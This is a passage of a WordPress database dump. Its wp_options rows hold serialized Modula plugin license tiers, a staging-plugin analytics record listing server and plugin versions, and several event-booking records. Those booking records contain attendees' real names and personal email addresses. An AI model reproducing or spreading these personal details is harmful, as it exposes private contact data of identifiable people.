strings.\";s:4:\"slug\";s:57:\"modula-advanced-shortcodes/modula-advanced-shortcodes.php\";}s:17:\"modula-protection\";a:3:{s:4:\"name\";s:22:\"Right-Click Protection\";s:11:\"description\";s:199:\"The Modula Protection extension allows you to easily prevent your visitors from downloading your images with right-click protection. Use this extension to retain full ownership of your creative work.\";s:4:\"slug\";s:39:\"modula-protection/modula-protection.php\";}s:23:\"modula-password-protect\";a:3:{s:4:\"name\";s:26:\"Password Protect Galleries\";s:11:\"description\";s:91:\"Password protect your galleries. This is a perfect solution for exclusive client galleries!\";s:4:\"slug\";s:51:\"modula-password-protect/modula-password-protect.php\";}s:16:\"modula-slideshow\";a:3:{s:4:\"name\";s:18:\"Lightbox Slideshow\";s:11:\"description\";s:98:\"Automatically turn your lightbox images into an auto-play slideshow. Play & pause between images. \";s:4:\"slug\";s:37:\"modula-slideshow/modula-slideshow.php\";}s:13:\"modula-slider\";a:3:{s:4:\"name\";s:25:\"Convert Gallery to Slider\";s:11:\"description\";s:116:\"Ever wanted to be able to create a gallery slider? One big image with thumbnail navigation below? We got it covered.\";s:4:\"slug\";s:31:\"modula-slider/modula-slider.php\";}s:13:\"modula-albums\";a:3:{s:4:\"name\";s:14:\"Gallery Albums\";s:11:\"description\";s:179:\"Give your galleries a place to call home with the Albums addon. Create albums, add galleries, manage cover photos, show gallery titles and even image counts in this superb add-on!\";s:4:\"slug\";s:31:\"modula-albums/modula-albums.php\";}s:17:\"modula-fullscreen\";a:3:{s:4:\"name\";s:10:\"Fullscreen\";s:11:\"description\";s:187:\"Delight your users with the possibility of showing images, inside the lightbox, in a full screen mode. Blow up your images as large as they can be with the native fullscreen browser mode.\";s:4:\"slug\";s:39:\"modula-fullscreen/modula-fullscreen.php\";}}}s:36:\"modula-grid-gallery-starter-lifetime\";a:6:{s:4:\"name\";s:40:\"Modula Grid Gallery - Starter (Lifetime)\";s:13:\"upgrade_price\";s:6:\"135.00\";s:4:\"slug\";s:36:\"modula-grid-gallery-starter-lifetime\";s:7:\"excerpt\";s:44:\"A tool for those that are just starting out.\";s:2:\"id\";i:538955;s:10:\"extensions\";a:3:{s:6:\"modula\";a:3:{s:4:\"name\";s:10:\"Modula PRO\";s:11:\"description\";s:0:\"\";s:4:\"slug\";s:17:\"modula/Modula.php\";}s:12:\"modula-video\";a:3:{s:4:\"name\";s:5:\"Video\";s:11:\"description\";s:137:\"Adding a video gallery with both self-hosted videos and videos from sources like YouTube and Vimeo to your website has never been easier.\";s:4:\"slug\";s:29:\"modula-video/modula-video.php\";}s:16:\"modula-slideshow\";a:3:{s:4:\"name\";s:18:\"Lightbox Slideshow\";s:11:\"description\";s:98:\"Automatically turn your lightbox images into an auto-play slideshow. Play & pause between images. \";s:4:\"slug\";s:37:\"modula-slideshow/modula-slideshow.php\";}}}s:28:\"modula-grid-gallery-business\";a:7:{s:4:\"name\";s:30:\"Modula Grid Gallery - Business\";s:13:\"upgrade_price\";s:5:\"99.00\";s:4:\"slug\";s:28:\"modula-grid-gallery-business\";s:7:\"excerpt\";s:26:\"Build the perfect gallery.\";s:2:\"id\";i:256712;s:10:\"extensions\";a:19:{s:6:\"modula\";a:3:{s:4:\"name\";s:10:\"Modula PRO\";s:11:\"description\";s:0:\"\";s:4:\"slug\";s:17:\"modula/Modula.php\";}s:12:\"modula-video\";a:3:{s:4:\"name\";s:5:\"Video\";s:11:\"description\";s:137:\"Adding a video gallery with both self-hosted videos and videos from sources like YouTube and Vimeo to your website has never been easier.\";s:4:\"slug\";s:29:\"modula-video/modula-video.php\";}s:14:\"modula-speedup\";a:3:{s:4:\"name\";s:7:\"SpeedUp\";s:11:\"description\";s:199:\"Allow Modula to automatically optimize your images to load as fast as possible by reducing their file sizes, resizing them through ShortPixel and serve them from StackPath\'s content delivery network.\";s:4:\"slug\";s:33:\"modula-speedup/modula-speedup.php\";}s:26:\"modula-advanced-shortcodes\";a:3:{s:4:\"name\";s:18:\"Advanced Shortcode\";s:11:\"description\";s:118:\"Allows you to dynamically link to specific galleries without creating pages for them by using URLs with query strings.\";s:4:\"slug\";s:57:\"modula-advanced-shortcodes/modula-advanced-shortcodes.php\";}s:17:\"modula-protection\";a:3:{s:4:\"name\";s:22:\"Right-Click Protection\";s:11:\"description\";s:199:\"The Modula Protection extension allows you to easily prevent your visitors from downloading your images with right-click protection. Use this extension to retain full ownership of your creative work.\";s:4:\"slug\";s:39:\"modula-protection/modula-protection.php\";}s:15:\"modula-deeplink\";a:3:{s:4:\"name\";s:12:\"SEO Deeplink\";s:11:\"description\";s:101:\"Full SEO control over your galleries. Create a unique and indexable URL for each Modula Gallery item.\";s:4:\"slug\";s:35:\"modula-deeplink/modula-deeplink.php\";}s:16:\"modula-watermark\";a:3:{s:4:\"name\";s:9:\"Watermark\";s:11:\"description\";s:101:\"Easily protect your photos by adding custom watermarks to your WordPress image galleries with Modula.\";s:4:\"slug\";s:37:\"modula-watermark/modula-watermark.php\";}s:23:\"modula-password-protect\";a:3:{s:4:\"name\";s:26:\"Password Protect Galleries\";s:11:\"description\";s:91:\"Password protect your galleries. This is a perfect solution for exclusive client galleries!\";s:4:\"slug\";s:51:\"modula-password-protect/modula-password-protect.php\";}s:16:\"modula-slideshow\";a:3:{s:4:\"name\";s:18:\"Lightbox Slideshow\";s:11:\"description\";s:98:\"Automatically turn your lightbox images into an auto-play slideshow. Play & pause between images. \";s:4:\"slug\";s:37:\"modula-slideshow/modula-slideshow.php\";}s:13:\"modula-slider\";a:3:{s:4:\"name\";s:25:\"Convert Gallery to Slider\";s:11:\"description\";s:116:\"Ever wanted to be able to create a gallery slider? One big image with thumbnail navigation below? We got it covered.\";s:4:\"slug\";s:31:\"modula-slider/modula-slider.php\";}s:13:\"modula-albums\";a:3:{s:4:\"name\";s:14:\"Gallery Albums\";s:11:\"description\";s:179:\"Give your galleries a place to call home with the Albums addon. Create albums, add galleries, manage cover photos, show gallery titles and even image counts in this superb add-on!\";s:4:\"slug\";s:31:\"modula-albums/modula-albums.php\";}s:11:\"modula-exif\";a:3:{s:4:\"name\";s:4:\"EXIF\";s:11:\"description\";s:88:\"The EXIF Addon for Modula allows you to edit & display EXIF metadata in your lightboxes.\";s:4:\"slug\";s:27:\"modula-exif/modula-exif.php\";}s:15:\"modula-download\";a:3:{s:4:\"name\";s:8:\"Download\";s:11:\"description\";s:103:\"Give your users the ability to download your images, galleries or albums with an easy to use shortcode.\";s:4:\"slug\";s:35:\"modula-download/modula-download.php\";}s:11:\"modula-zoom\";a:3:{s:4:\"name\";s:4:\"Zoom\";s:11:\"description\";s:90:\"Adds zoom functionality to images, when opened in the lightbox, to allow up close viewing.\";s:4:\"slug\";s:27:\"modula-zoom/modula-zoom.php\";}s:15:\"modula-defaults\";a:3:{s:4:\"name\";s:8:\"Defaults\";s:11:\"description\";s:245:\"Speed up your gallery creation process by starting from a pre-saved default. Save any gallery\'s settings as a default and reuse them indefinitely. Got a bunch of galleries you want to apply a default to? That\'s possible too with this extension. \";s:4:\"slug\";s:35:\"modula-defaults/modula-defaults.php\";}s:12:\"modula-roles\";a:3:{s:4:\"name\";s:15:\"Role Management\";s:11:\"description\";s:177:\"Granular control over which user roles can add, edit or update galleries on your website. Add permissions to an existing user role or remove them by simply checking a checkbox. \";s:4:\"slug\";s:29:\"modula-roles/modula-roles.php\";}s:17:\"modula-pagination\";a:3:{s:4:\"name\";s:10:\"Pagination\";s:11:\"description\";s:79:\"Modula Pagination allows you to display your gallery images in a paginated way.\";s:4:\"slug\";s:39:\"modula-pagination/modula-pagination.php\";}s:17:\"modula-whitelabel\";a:3:{s:4:\"name\";s:11:\"White Label\";s:11:\"description\";s:164:\"Want to use Modula but brand it with your own logo, external URLs and remove all mentions that aren\'t related to your brand? This extension helps you achieve this. \";s:4:\"slug\";s:39:\"modula-whitelabel/modula-whitelabel.php\";}s:17:\"modula-fullscreen\";a:3:{s:4:\"name\";s:10:\"Fullscreen\";s:11:\"description\";s:187:\"Delight your users with the possibility of showing images, inside the lightbox, in a full screen mode. Blow up your images as large as they can be with the native fullscreen browser mode.\";s:4:\"slug\";s:39:\"modula-fullscreen/modula-fullscreen.php\";}}s:14:\"extra_features\";a:2:{s:5:\"sites\";i:5;s:7:\"support\";s:8:\"Priority\";}}s:23:\"modula-grid-gallery-duo\";a:7:{s:4:\"name\";s:26:\"Modula Grid Gallery - Trio\";s:13:\"upgrade_price\";s:5:\"69.00\";s:4:\"slug\";s:23:\"modula-grid-gallery-duo\";s:7:\"excerpt\";s:39:\"Power users who need even more control.\";s:2:\"id\";i:256708;s:10:\"extensions\";a:10:{s:6:\"modula\";a:3:{s:4:\"name\";s:10:\"Modula PRO\";s:11:\"description\";s:0:\"\";s:4:\"slug\";s:17:\"modula/Modula.php\";}s:12:\"modula-video\";a:3:{s:4:\"name\";s:5:\"Video\";s:11:\"description\";s:137:\"Adding a video gallery with both self-hosted videos and videos from sources like YouTube and Vimeo to your website has never been easier.\";s:4:\"slug\";s:29:\"modula-video/modula-video.php\";}s:14:\"modula-speedup\";a:3:{s:4:\"name\";s:7:\"SpeedUp\";s:11:\"description\";s:199:\"Allow Modula to automatically optimize your images to load as fast as possible by reducing their file sizes, resizing them through ShortPixel and serve them from StackPath\'s content delivery network.\";s:4:\"slug\";s:33:\"modula-speedup/modula-speedup.php\";}s:26:\"modula-advanced-shortcodes\";a:3:{s:4:\"name\";s:18:\"Advanced Shortcode\";s:11:\"description\";s:118:\"Allows you to dynamically link to specific galleries without creating pages for them by using URLs with query strings.\";s:4:\"slug\";s:57:\"modula-advanced-shortcodes/modula-advanced-shortcodes.php\";}s:17:\"modula-protection\";a:3:{s:4:\"name\";s:22:\"Right-Click Protection\";s:11:\"description\";s:199:\"The Modula Protection extension allows you to easily prevent your visitors from downloading your images with right-click protection. Use this extension to retain full ownership of your creative work.\";s:4:\"slug\";s:39:\"modula-protection/modula-protection.php\";}s:23:\"modula-password-protect\";a:3:{s:4:\"name\";s:26:\"Password Protect Galleries\";s:11:\"description\";s:91:\"Password protect your galleries. This is a perfect solution for exclusive client galleries!\";s:4:\"slug\";s:51:\"modula-password-protect/modula-password-protect.php\";}s:16:\"modula-slideshow\";a:3:{s:4:\"name\";s:18:\"Lightbox Slideshow\";s:11:\"description\";s:98:\"Automatically turn your lightbox images into an auto-play slideshow. Play & pause between images. \";s:4:\"slug\";s:37:\"modula-slideshow/modula-slideshow.php\";}s:13:\"modula-slider\";a:3:{s:4:\"name\";s:25:\"Convert Gallery to Slider\";s:11:\"description\";s:116:\"Ever wanted to be able to create a gallery slider? One big image with thumbnail navigation below? We got it covered.\";s:4:\"slug\";s:31:\"modula-slider/modula-slider.php\";}s:13:\"modula-albums\";a:3:{s:4:\"name\";s:14:\"Gallery Albums\";s:11:\"description\";s:179:\"Give your galleries a place to call home with the Albums addon. Create albums, add galleries, manage cover photos, show gallery titles and even image counts in this superb add-on!\";s:4:\"slug\";s:31:\"modula-albums/modula-albums.php\";}s:17:\"modula-fullscreen\";a:3:{s:4:\"name\";s:10:\"Fullscreen\";s:11:\"description\";s:187:\"Delight your users with the possibility of showing images, inside the lightbox, in a full screen mode. Blow up your images as large as they can be with the native fullscreen browser mode.\";s:4:\"slug\";s:39:\"modula-fullscreen/modula-fullscreen.php\";}}s:14:\"extra_features\";a:2:{s:5:\"sites\";i:3;s:7:\"support\";s:7:\"Regular\";}}}}','no'),(7490550,'wp-optimize-redirection_possible','true','yes'),(7494474,'mec_cart_824858318','a:0:{}','no'),(7579345,'sm_cpages','a:0:{}','no'),(7579328,'sm_beta_banner_discarded_count','3','yes'),(7579332,'sm_hide_auto_update_banner','yes','yes'),(7490543,'mec_cart_246546462','a:0:{}','no'),(7579318,'sm_rewrite_done','$Id: class-googlesitemapgeneratorloader.php 937300 2014-06-23 18:04:11Z arnee $','yes'),(7553250,'mec_cart_310140766','a:0:{}','no'),(7445065,'MPV39039','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lawless80537@gmail.com\";s:4:\"name\";s:8:\"Jeff Law\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268685\";s:19:\"translated_event_id\";s:6:\"268685\";s:4:\"date\";s:21:\"1688293800:1688297400\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688293800:1688297400\";}s:10:\"booking_id\";i:268713;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"0972a05ebb673a8156616cce4fb1ba68\";}','no'),(7540991,'wpstg_analytics_event_570967777','{\"is_allowing_email\":true,\"is_symlinking_uploads_folder\":false,\"is_external_database\":false,\"number_of_tables\":96,\"event\":\"event_staging_create\",\"job_identifier\":570967777,\"event_hash\":\"1695317787.8946428785038\",\"is_finished\":true,\"is_stale\":false,\"is_error\":false,\"is_cancelled\":false,\"is_requirement_check_fail\":false,\"requirement_fail_reason\":\"\",\"error_message\":null,\"last_debug_logs\":null,\"ready_to_send\":true,\"start_time\":1695317787,\"end_time\":1695317891,\"duration\":104,\"site_info\":{\"is_staging_site\":0,\"db_copy_query_limit\":null,\"db_sr_limit\":null,\"file_copy_limit\":null,\"cpu_priority\":null,\"file_copy_batch_size\":null,\"max_file_size\":null,\"optimizer\":null,\"keep_permalinks\":false,\"disable_admin_login\":false,\"delay_between_requests\":0,\"debug_mode\":false,\"remove_data_on_uninstall\":false,\"check_directory_size\":false,\"access_permission\":[],\"users_with_staging_access\":\"\",\"php_version\":\"8.0.30\",\"blog_id\":1,\"network_id\":1,\"single_or_multi\":\"single\",\"wpstaging_free_or_pro\":\"free\",\"wpstaging_version\":\"3.0.4\",\"operating_system_family\":\"UNIX\",\"operating_system_family_raw\":\"Linux\",\"active_theme\":\"boldgrid-hydra\",\"wordpress_version\":\"6.3.1\",\"wpdb_version\":55853,\"db_collate\":\"utf8mb4_unicode_520_ci\",\"db_charset\":\"utf8mb4\",\"sql_server_version_number\":\"10.6.15\",\"sql_server_version_engine\":\"MARIADB\",\"sql_server_version_engine_raw\":\"10.6.15-MariaDB\",\"site_active_plugins\":{\"404page\\/404page.php\":\"11.4.3\",\"advanced-google-recaptcha\\/advanced-google-recaptcha.php\":\"1.0.15\",\"async-javascript\\/async-javascript.php\":\"2.21.08.31\",\"autoptimize\\/autoptimize.php\":\"3.1.8.1\",\"boldgrid-backup-premium\\/boldgrid-backup-premium.php\":\"1.5.9\",\"boldgrid-backup\\/boldgrid-backup.php\":\"1.15.7\",\"boldgrid-easy-seo\\/boldgrid-easy-seo.php\":\"1.6.13\",\"code-snippets\\/code-snippets.php\":\"3.5.0\",\"content-protector\\/content-protector.php\":\"4.2.4\",\"disable-comments\\/disable-comments.php\":\"2.4.5\",\"duplicate-post\\/duplicate-post.php\":\"4.5\",\"fluentform\\/fluentform.php\":\"5.0.9\",\"folders-pro\\/folders.php\":\"2.9.8\",\"ga-google-analytics\\/ga-google-analytics.php\":\"20230721\",\"html-editor-syntax-highlighter\\/html-editor-syntax-highlighter.php\":\"2.4.4\",\"insert-headers-and-footers\\/ihaf.php\":\"2.1.3.1\",\"kt-tinymce-color-grid\\/index.php\":\"1.15.5\",\"mec-fluent-layouts\\/mec-fluent-layouts.php\":\"1.5.0\",\"mec-liquid-layouts\\/mec-liquid-layouts.php\":\"1.2.0\",\"modern-events-calendar\\/mec.php\":\"7.1.0\",\"modula-best-grid-gallery\\/Modula.php\":\"2.7.7\",\"ninja-forms\\/ninja-forms.php\":\"3.6.31\",\"plugin-notes-plus\\/plugin-notes-plus.php\":\"1.2.6\",\"post-and-page-builder-premium\\/post-and-page-builder-premium.php\":\"1.1.1\",\"post-and-page-builder\\/post-and-page-builder.php\":\"1.25.0\",\"protect-the-children\\/index.php\":\"1.4.0\",\"really-simple-ssl\\/rlrsssl-really-simple-ssl.php\":\"7.0.9\",\"redis-cache\\/redis-cache.php\":\"2.4.4\",\"remember-me-controls\\/remember-me-controls.php\":\"2.0.1\",\"remove-dashboard-access-for-non-admins\\/remove-dashboard-access.php\":\"1.1.5\",\"responsive-accordion-and-collapse\\/responsive-accordion.php\":\"2.4.4\",\"scripts-to-footerphp\\/scripts-to-footer.php\":\"0.7.1\",\"simple-custom-css\\/simple-custom-css.php\":\"4.0.6\",\"simple-history\\/index.php\":\"4.6.0\",\"styler-for-ninja-forms-lite\\/ninja-forms-styler-lite.php\":\"3.3.4\",\"tinymce-advanced\\/tinymce-advanced.php\":\"5.9.2\",\"updraftplus\\/updraftplus.php\":\"1.23.10\",\"wordfence\\/wordfence.php\":\"7.10.3\",\"wp-fastest-cache\\/wpFastestCache.php\":\"1.1.9\",\"wp-optimize\\/wp-optimize.php\":\"3.2.19\",\"wp-staging\\/wp-staging.php\":\"3.0.4\",\"www-xml-sitemap-generator-org\\/www-xml-sitemap-generator-org.php\":\"2.0.7\"},\"mu_plugins\":{\"wp-staging-optimizer.php\":\"1.5.1\"},\"network_active_plugins\":\"\",\"php_extensions\":[\"Core\",\"date\",\"libxml\",\"openssl\",\"pcre\",\"zlib\",\"filter\",\"hash\",\"json\",\"pcntl\",\"Reflection\",\"SPL\",\"session\",\"standard\",\"cgi-fcgi\",\"bcmath\",\"bz2\",\"calendar\",\"ctype\",\"curl\",\"dba\",\"dom\",\"enchant\",\"mbstring\",\"fileinfo\",\"ftp\",\"gd\",\"gettext\",\"gmp\",\"iconv\",\"imap\",\"intl\",\"ldap\",\"exif\",\"mysqlnd\",\"odbc\",\"PDO\",\"pgsql\",\"Phar\",\"posix\",\"pspell\",\"shmop\",\"SimpleXML\",\"snmp\",\"soap\",\"sockets\",\"sqlite3\",\"sysvmsg\",\"sysvsem\",\"sysvshm\",\"tidy\",\"tokenizer\",\"xml\",\"xmlwriter\",\"xsl\",\"zip\",\"mysqli\",\"pdo_mysql\",\"PDO_ODBC\",\"pdo_pgsql\",\"pdo_sqlite\",\"xmlreader\",\"imagick\",\"Zend OPcache\"]}}','no'),(7599622,'GHY43151','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"jennydelapp@yahoo.com\";s:4:\"name\";s:21:\"Jenny DeLapp Gallegos\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269260\";s:19:\"translated_event_id\";s:6:\"269260\";s:4:\"date\";s:21:\"1699785000:1699831800\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1699785000:1699831800\";}s:10:\"booking_id\";i:269377;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"b6bd01b3d86348fab1a19bfa0df4afba\";}','no'),(7540963,'wpstg_free_install_date','2023-09-21 05:30:04','yes'),(7449991,'EQL46700','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"bluehuuron@yahoo.com\";s:4:\"name\";s:9:\"Jack Lile\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268685\";s:19:\"translated_event_id\";s:6:\"268685\";s:4:\"date\";s:21:\"1688293800:1688297400\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688293800:1688297400\";}s:10:\"booking_id\";i:268768;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"c09043b72649e0823fdc8b1922bdc87f\";}','no'),(7450024,'PNM51328','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"dkolter@gmx.net\";s:4:\"name\";s:4:\"Dirk\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268685\";s:19:\"translated_event_id\";s:6:\"268685\";s:4:\"date\";s:21:\"1688293800:1688297400\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688293800:1688297400\";}s:10:\"booking_id\";i:268769;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"ca3b1f1938ad842017d94aef9dda7efb\";}','no'),(7449993,'mec_cart_310205449','a:0:{}','no'),(7481420,'NQO96287','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"Choll.03@comcast.net\";s:4:\"name\";s:6:\"Chris3\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268863\";s:19:\"translated_event_id\";s:6:\"268863\";s:4:\"date\";s:21:\"1691922600:1691926200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1691922600:1691926200\";}s:10:\"booking_id\";i:268868;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"9491ed8903376bd1f4598bd1df4239ae\";}','no'),(7450026,'mec_cart_723981383','a:0:{}','no'),(7454924,'CEB36442','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:4:\"Beth\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268679\";s:19:\"translated_event_id\";s:6:\"268679\";s:4:\"date\";s:21:\"1688898600:1688902200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688898600:1688902200\";}s:10:\"booking_id\";i:268783;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"02539fcfe4892def82a0ae8a769bfcef\";}','no'),(7454513,'mec_cart_703778859','a:0:{}','no'),(7454997,'QKT59940','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268679\";s:19:\"translated_event_id\";s:6:\"268679\";s:4:\"date\";s:21:\"1688898600:1688902200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688898600:1688902200\";}s:10:\"booking_id\";i:268784;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"46a538306fffdf062f1fd7027a769177\";}','no'),(7454926,'mec_cart_198680491','a:0:{}','no'),(7455031,'VFQ21754','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:31:\"shannon.everett2018@outlook.com\";s:4:\"name\";s:15:\"Shannon Everett\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268679\";s:19:\"translated_event_id\";s:6:\"268679\";s:4:\"date\";s:21:\"1688898600:1688902200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688898600:1688902200\";}s:10:\"booking_id\";i:268785;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"90c0868abb476155f229991651f58dc9\";}','no'),(7454999,'mec_cart_827701969','a:0:{}','no'),(7455305,'HBY28530','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet 